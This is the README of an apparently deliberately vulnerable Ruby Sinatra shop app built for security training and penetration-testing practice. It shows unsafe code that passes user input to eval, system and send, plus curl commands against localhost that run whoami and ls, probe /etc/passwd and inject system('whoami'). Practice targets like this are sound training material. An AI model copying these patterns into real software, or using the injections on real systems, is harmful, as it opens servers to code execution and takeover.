This repository demonstrates a real-world Ruby web application with multiple injection vulnerabilities. Unlike security demos that show how to prevent attacks, this application contains actual exploitable vulnerabilities that can be triggered through HTTP requests, making it suitable for security testing, penetration testing practice, and vulnerability research.
This e-commerce platform contains multiple serious security vulnerabilities:
The try_cache method accepts ANY method name without validation:
def self.try_cache(object, method_name, attribute = nil)
# NO VALIDATION - This allows arbitrary method calls!
object.send(method_name.to_sym)
end- Risk: Arbitrary method invocation on objects
- Impact: Information disclosure, potential RCE
- Exploitation: Via HTTP parameters in multiple endpoints
Direct evaluation of user input as Ruby code:
def self.dynamic_call(object, code_string)
# This evaluates arbitrary Ruby code - MAJOR VULNERABILITY!
eval("object.#{code_string}")
end- Risk: Remote code execution
- Impact: Full system compromise
- Exploitation: Via
/user/profile?code=parameter
Direct execution of system commands:
def self.execute_command(command)
# Directly execute system commands - COMMAND INJECTION!
system(command)
end- Risk: Operating system command execution
- Impact: System takeover
- Exploitation: Via
/admin/tools?command=parameter
No validation of checkout steps:
def advance_to_step(step_name)
# NO VALIDATION - accepts any input including malicious code
@checkout_step = step_name.to_s
end- Risk: Arbitrary data injection
- Impact: Application logic bypass
- Exploitation: Via POST requests to checkout endpoints
Multiple eval() calls throughout the application:
def execute_step_code(code)
# This evaluates arbitrary Ruby code - MAJOR VULNERABILITY!
eval(code)
end- Risk: Direct code evaluation
- Impact: Full application compromise
- Exploitation: Via
/checkout/executeendpoint
- Ruby 3.2+
- Bundler
bundle installbundle exec rackup -p 4567bundle exec rspecThe application exposes multiple vulnerable endpoints that can be exploited via HTTP requests:
Product Search Method Injection:
# Exploit method injection to call any method on Product objects
curl "http://localhost:4567/products/search?method=class"
curl "http://localhost:4567/products/search?method=methods"
curl "http://localhost:4567/products/search?method=instance_variables"API Method Injection:
# Call arbitrary methods on User, Product, or Order objects
curl "http://localhost:4567/api/call?object=user&method=class"
curl "http://localhost:4567/api/call?object=user&method=methods"
curl "http://localhost:4567/api/call?object=product&method=instance_variables"User Profile Code Execution:
# Execute arbitrary Ruby code in user context
curl "http://localhost:4567/user/profile?code=name.upcase"
curl "http://localhost:4567/user/profile?code=class.ancestors.first.name"
curl "http://localhost:4567/user/profile?code=2*21"Checkout Code Execution:
# Execute arbitrary Ruby code via POST
curl -X POST "http://localhost:4567/checkout/execute" -d "code=puts 'pwned'"
curl -X POST "http://localhost:4567/checkout/execute" -d "code=File.exist?('/etc/passwd')"Admin Tools Command Execution:
# Execute arbitrary system commands
curl "http://localhost:4567/admin/tools?command=whoami"
curl "http://localhost:4567/admin/tools?command=pwd"
curl "http://localhost:4567/admin/tools?command=ls -la"Checkout Step Manipulation:
# Inject arbitrary data into checkout steps
curl -X POST "http://localhost:4567/checkout/custom" -d "step=malicious_payload"
curl -X POST "http://localhost:4567/checkout/custom" -d "step=system('whoami')"Successful exploits return JSON responses like:
{
"status": "success",
"message": "Code executed successfully",
"result": "User"
}- ✅ 35 passing vulnerability tests
- ✅ All injection patterns work as expected
- ✅ Dangerous operations execute successfully
The application successfully executes these dangerous patterns:
- Method Injection:
object.send(user_input)allows calling any method - Code Evaluation:
eval(user_input)executes arbitrary Ruby code - Command Execution:
system(user_input)runs OS commands - Object Manipulation: Direct access to Ruby object internals
- File Operations: Unrestricted file system access
- Process Control: Ability to spawn processes and manipulate environment
This application intentionally contains multiple critical vulnerabilities:
- ❌ No input validation or sanitization
- ❌ Direct eval() of user input
- ❌ Unrestricted method invocation
- ❌ Command injection vulnerabilities
- ❌ No access controls or authorization
├── app.rb # Vulnerable Sinatra web application
├── lib/
│ ├── secure_cache.rb # VulnerableCache - method injection vulnerabilities
│ ├── checkout_system.rb # VulnerableCheckout - code execution vulnerabilities
│ └── models.rb # Basic domain models (User, Product, Order)
├── spec/ # Vulnerability verification test suite
├── Gemfile # Ruby dependencies
└── config.ru # Rack web server configuration
This application demonstrates multiple categories of web application vulnerabilities:
- Method injection via unvalidated
send()calls - Code injection via
eval()execution - Command injection via
system()calls
- Direct access to Ruby object methods and properties
- Unrestricted method enumeration and introspection
- No sanitization of user input
- Direct assignment of user data to application state
- Admin functions accessible without authentication
- No authorization checks on sensitive operations
- Method enumeration exposes internal application structure
- Error messages reveal system information
- Object introspection reveals sensitive data
This application serves as a practical example for:
- Security Testing: Practice identifying and exploiting real vulnerabilities
- Penetration Testing: Realistic target for testing attack techniques
- Vulnerability Research: Study common Ruby/Rails security anti-patterns
- Security Training: Hands-on experience with dangerous coding practices